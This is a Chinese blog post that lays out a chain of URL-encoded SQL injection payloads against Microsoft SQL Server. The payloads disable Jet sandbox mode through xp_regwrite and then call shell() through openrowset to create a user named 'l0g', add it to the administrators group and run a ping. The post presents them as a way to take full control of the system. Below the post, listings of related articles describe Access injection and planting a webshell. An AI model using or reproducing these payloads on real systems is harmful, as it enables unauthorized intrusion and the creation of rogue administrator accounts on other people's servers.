利用access执行命令的一个实例

最新推荐文章于 2025-12-06 02:52:33 发布
原创 最新推荐文章于 2025-12-06 02:52:33 发布 · 1k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#access #database #shell #user #c
本文展示了一种利用SQL注入漏洞进行权限提升的方法,通过特定的SQL语句修改注册表设置,并利用OLE DB连接执行系统命令创建新用户并将其加入管理员组,最终实现对系统的完全控制。


;exec%20master..xp_regwrite%20'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0;--


%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20user%20l0g%20l0g%20/add")'))


%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20net%20localgroup%20administrators%20l0g%20/add")'))

net%20localgroup%20administrators%20l0g%20/add


 %20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/dnary.mdb','select%20shell("cmd.exe%20/c%20ping xxx.xxx.xxx.xxx")'))

l0g
关注
专栏目录
CMD 操作ACCESS
08-20
在CMD下直接输SQL语句操作ACESS2007。类似于sqlplus.
Access数据库也能执行cmd命令
李慖铖dē個亻專欄
07-23 7005
Access数据库也能执行cmd命令 Access查询中有类似这样的语句 Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'  关于这个语句的介绍,是漏洞资料中所说的,Access允许用"|"来创建VBA函数,导致命令被执行,其实这只是Access内置的一个特殊函数而已,相类似的
Access如何直接运行SQL语句
热门推荐
驽马十驾 才定不舍
04-12 1万+
iamlaosong文Access没有提供直接运行SQL命令的窗口,利用查询设计中的SQL视图窗口可以输入SQL语句操控数据库表。说是查询,其实也可以输入更新、删除语句,输入完成后,点击运行就可以执行这条语句。需要注意的是,SQL语句中表名和字段名如果是关键字就要用方括号括起来,但也不要怕碰到关键字都加上方括号,因为有些关键字(如Top,On)后面的字段名不能加方括号,所以尽量不要用关键字命名表名...
Access中执行SQL语句
gergul的专栏
10-18 4358
5.如果想再次执行SQL,则可在MDI窗口标题栏右键,在弹出的菜单中选择“SQL 视图”即可。3. 在“设计”页中点击“数据定义”进入输入SQL语句界面。2. 关闭弹出的窗口,创建一个空查询。4. “执行”后就能看到执行结果。
ACCESS的真假:一、DROP删除表再重建比Delete from Table1快吗?
ACMAIN_CHM的专栏
05-16 6901
有时候当我们需要把表中记录全部删除的时候,在很多数据库系统中我们会习惯性选择用truncate table 来实现,truncate table 在很多DBMS中是认为DDL语句,等同于drop table 然后再create table. 速度效率上一般认为远比delete from table高得多。 虽然Drop table 和 delete 没什么可比性,有些类似于去拿 insert
Access环境下使用PowerShell执行SQL命令
weixin_33908217的博客
08-22 831
要使用数据就要先连接上数据库,连接Access的方式有好几种,我现在使用的是Oledb连接方式。其中又分为无密码和有密码。 无密码连接文本:Provider=Microsoft.ACE.OLEDB.12.0;Data Source=myAccessFile.accdb;Persist Security Info=False;有密码连接文本:Provider=Microsoft.ACE.OLEDB....
Delphi连接ACCESS的方法
darkhorse_guo的专栏
11-12 6248
Delphi连接ACCESS的方法一、    TADOConnection             //connMain为TADOConnection            TADOConnection主要作用是连接数据库1、 ConnectionString:连接数据库2、 Connected:设为True3、 KeepConnection:设为True4、 loginPro
ACCESS高级注入教程
广外女生官方BLOG
09-15 1533
 现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据库的攻击方式,而MSSQL Server的方法则更为多样和复杂, 当我们取得连接权限较高的注入点的时候,我们可以利用MSSQL Server本身所带的扩展来执行命令,或者是获取目录,读取文件与修改注册表;在低权用户的连接中,我
Access Key ID 和 Secret Access Key 到底是什么、有什么作用、什么时候用
最新发布
weixin_45428910的博客
12-06 1406
Access Key ID 和 Secret Access Key 到底是什么、有什么作用、什么时候用
C#操作Access通用类实例
贝爷的博客
03-06 4123
这篇文章主要介绍了C#操作Access通用类,实例分析了C#操作access的各种常见技巧,非常具有实用价值,需要的朋友可以参考下 using System; using System.Data; using System.Configuration; using System.Web; using System.Web.Security; using System.Web.UI; using
c语言 dbcmd函数,Access数据库也能执行cmd命令
weixin_42368226的博客
05-28 463
Access查询中有类似这样的语句Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'关于这个语句的介绍,是漏洞资料中所说的,Access允许用"|"来创建VBA函数,导致命令被执行,其实这只是Access内置的一个特殊函数而已,相类似的还有cudir和Command函数.具体的我们可以在Access中...
通用 sql | 数据库 命令
weixin_43959227的博客
03-04 535
基础教程: 选择 | 条件 | 排序 | 插入 | 更新 | 删除 | select| where| order by| insert into| update| delete | select 选择: select *(column_name1,column_name2…) from table_name; select distinct 唯一不重复。 where ...
Access查询中执行SQL语句
cychai的专栏
06-02 7858
如何在Access查询中输入自己的SQL语句? --> 打开你的MDB --> 在数据库窗口中,点击“查询”,或在“视图”菜单中选择“数据库对象”-> “查询” --> 点击数据库窗口中的“新建”按钮 --> 点击“确定”,关闭“显示表”窗口 --> 点击工具栏上的“SQL”,或在“视图”菜单中选择“SQL   视图” --> 删掉所有的内容 --> 直接输入SQL语句即可  动画,如何建
抓包工具+Access注入
Jim的博客
09-18 2330
GET注入,POST注入,Cookie注入,消息头注入 数字型注入 字符型注入 搜索型注入 联合查询注入 报错型注入 盲注入(基于时间型盲注,基于逻辑错误) 切记:access没有注释符 注意:union select 后门一定要跟from表名,而只能靠猜表名 注意:Access只能靠猜,所以
SQL高级语句-DROP 语句,可以轻松地删除索引、表和数据库。
qq_35144470的博客
02-28 7781
DROP INDEX 语句 我们可以使用 DROP INDEX 命令删除表格中的索引。 用于 Microsoft SQLJet (以及 Microsoft Access) 的语法: DROP INDEX index_name ON table_name 用于 MS SQL Server 的语法: DROP INDEX table_name.index_name 用于 IBM DB2
ACCESS执行SQL语句导出一句话拿webshell
eldn__的专栏
12-21 7523
实用环境,在access后台其他方法不能拿到webshell 但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了 不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。 至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。 逐一执行以下语句就可以导出一句话了
web历史记录
l0ng专栏
03-07 1212
http://web.archive.org/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值